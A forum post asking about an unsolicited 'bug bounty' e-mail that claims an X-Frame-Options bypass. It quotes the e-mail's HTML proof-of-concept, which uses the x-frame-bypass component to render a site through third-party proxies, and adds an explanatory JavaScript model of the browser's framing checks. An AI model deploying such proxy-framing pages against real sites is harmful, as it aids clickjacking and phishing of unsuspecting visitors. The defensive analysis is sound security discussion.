Neron
Today I received this e-mail:
Could you please tell me what this is and whether it is worth paying attention to?

Hi there,
Team, I have found a vulnerability in your site.
bypass X-Frame-Options ( Proxy protection NOT used )
Proxy protection NOT used, I can bypass the X-Frame-Options header and recreate clickjacking on the whole domain.
I see that you don't have reverse proxy protection, which allows attackers to proxy your website rather than iframe it.
POC:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="X-Frame-Bypass: Web Component extending IFrame to bypass X-Frame-Options: deny/sameorigin">
<title>X-Frame-Bypass Web Component Demo</title>
<style>
html, body {
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
}
iframe {
display: block;
width: calc(100% - 40px);
height: calc(100% - 40px);
margin: 20px;
}
img {
position: absolute;
top: 0;
right: 0;
}
</style>
<!-- polyfill so that customized built-in elements (<iframe is="..."> below) also work in browsers without native support -->
<script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
<!-- x-frame-bypass.js is not included in the e-mail; it is the open-source x-frame-bypass web component, which does not
     load the target in the frame directly but fetches its HTML through third-party CORS proxies and injects the copy via srcdoc -->
<script src="x-frame-bypass.js" type="module"></script>
</head>
<body>
<h1> X-FRAME PROTECTION BYPASSED </h1>
<iframe is="x-frame-bypass" src="https://mysite.com/"></iframe>
</body>
</html>
FIX:
Content-Security-Policy: frame-ancestors 'self' is better, because it checks all frame ancestors.
You should implement a CSP header to avoid this sort of attack.
Please let me know if you want more information.
Hope that you appreciate my ethical disclosure of this vulnerability; hoping for the bounty.
Thank you!
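The e-mail's FIX line claims that `frame-ancestors` is better because it checks all frame ancestors. The following JavaScript is an added example, not part of the post or of the e-mail, that models the decision a browser makes when a response is loaded into an iframe: CSP `frame-ancestors`, when present, is matched against every ancestor origin and takes precedence over `X-Frame-Options`; `X-Frame-Options: SAMEORIGIN` is compared against all ancestors in current engines, while a `legacyTopOnly` option models older engines that compared only the top-level page. The origins `mysite.com`, `attacker.example` and `partner.example`, the ancestor chains and the header sets are constructed for the demo; the CSP source-expression matcher is simplified (scheme-less host sources match any scheme, no path matching).

```javascript
// Added example: model of the browser's "may this response be framed?" decision.
// Not the original post's or the e-mail's code; origins and headers are constructed.

// Origin of a URL as "scheme://host[:port]".
function originOf(url) {
  return new URL(url).origin;
}

// Comma-separated header value -> unique, lowercased tokens.
function headerTokens(value) {
  return [...new Set(value.split(",").map(s => s.trim().toLowerCase()).filter(Boolean))];
}

// Does one CSP source expression match an ancestor origin?
// Supports 'none', 'self', scheme-only sources ("https:") and host sources with
// optional scheme, optional "*." wildcard and optional port (simplified matcher).
function sourceMatches(expr, ancestorOrigin, documentOrigin) {
  expr = expr.toLowerCase();
  if (expr === "'none'") return false;
  if (expr === "'self'") return ancestorOrigin === documentOrigin;
  const a = new URL(ancestorOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(expr)) return a.protocol === expr; // scheme-source
  const [scheme, rest] = expr.includes("://") ? expr.split("://") : [null, expr];
  if (scheme && a.protocol !== scheme + ":") return false;
  const [host, port] = rest.split(":");
  const hostOk = host.startsWith("*.")
    ? a.hostname.endsWith(host.slice(1)) // "*.partner.example" matches "a.partner.example"
    : a.hostname === host;
  if (!hostOk) return false;
  if (port === undefined || port === "*") return true;
  return (a.port || (a.protocol === "https:" ? "443" : "80")) === port;
}

// Decide whether the document served from documentUrl with `headers` may be shown
// inside a frame whose ancestors are ancestorUrls (innermost parent first,
// top-level page last). Returns { allowed, reason }.
function mayBeFramed(documentUrl, headers, ancestorUrls, opts = {}) {
  const docOrigin = originOf(documentUrl);
  const ancestors = ancestorUrls.map(originOf);
  if (ancestors.length === 0) return { allowed: true, reason: "top-level document, not framed" };
  const lower = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));

  // 1. CSP frame-ancestors, if present, is authoritative and X-Frame-Options is ignored.
  //    Every ancestor in the chain must match at least one source expression.
  const csp = lower["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(s => s.trim())
      .find(d => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      const bad = ancestors.find(anc => !sources.some(src => sourceMatches(src, anc, docOrigin)));
      return bad
        ? { allowed: false, reason: `frame-ancestors rejects ancestor ${bad}` }
        : { allowed: true, reason: "every ancestor matches frame-ancestors" };
    }
  }

  // 2. Otherwise fall back to X-Frame-Options.
  const xfo = lower["x-frame-options"];
  if (!xfo) return { allowed: true, reason: "no framing restriction" };
  const tokens = headerTokens(xfo);
  if (tokens.includes("deny")) return { allowed: false, reason: "X-Frame-Options: DENY" };
  if (tokens.includes("sameorigin")) {
    // Current engines compare every ancestor; opts.legacyTopOnly models older engines
    // that compared only the top-level page, which is the gap behind "checks all ancestors".
    const checked = opts.legacyTopOnly ? ancestors.slice(-1) : ancestors;
    const bad = checked.find(anc => anc !== docOrigin);
    return bad
      ? { allowed: false, reason: `X-Frame-Options: SAMEORIGIN rejects ancestor ${bad}` }
      : { allowed: true, reason: "X-Frame-Options: SAMEORIGIN, all checked ancestors are same-origin" };
  }
  return { allowed: true, reason: "X-Frame-Options value not recognised (e.g. ALLOW-FROM), ignored" };
}

// Constructed scenario: a same-origin page at the top frames attacker.example,
// which in turn frames the sensitive mysite.com page.
const site = "https://mysite.com/";
const nested = ["https://attacker.example/trap", "https://mysite.com/top"];
console.log(mayBeFramed(site, { "X-Frame-Options": "SAMEORIGIN" }, nested, { legacyTopOnly: true }));
console.log(mayBeFramed(site, { "X-Frame-Options": "SAMEORIGIN" }, nested));
console.log(mayBeFramed(site, { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" }, nested));
```

In the nested scenario the legacy top-only check lets `attacker.example` sit between the two same-origin frames, while the current `SAMEORIGIN` check and `frame-ancestors 'self'` both reject it; sending both headers covers old and new engines. Note that neither header is consulted by the POC shown above: the x-frame-bypass component it loads does not frame `mysite.com` at all, it fetches the HTML through a third-party proxy and renders that copy, which carries none of the visitor's cookies or session, so the response headers of the real site cannot influence it.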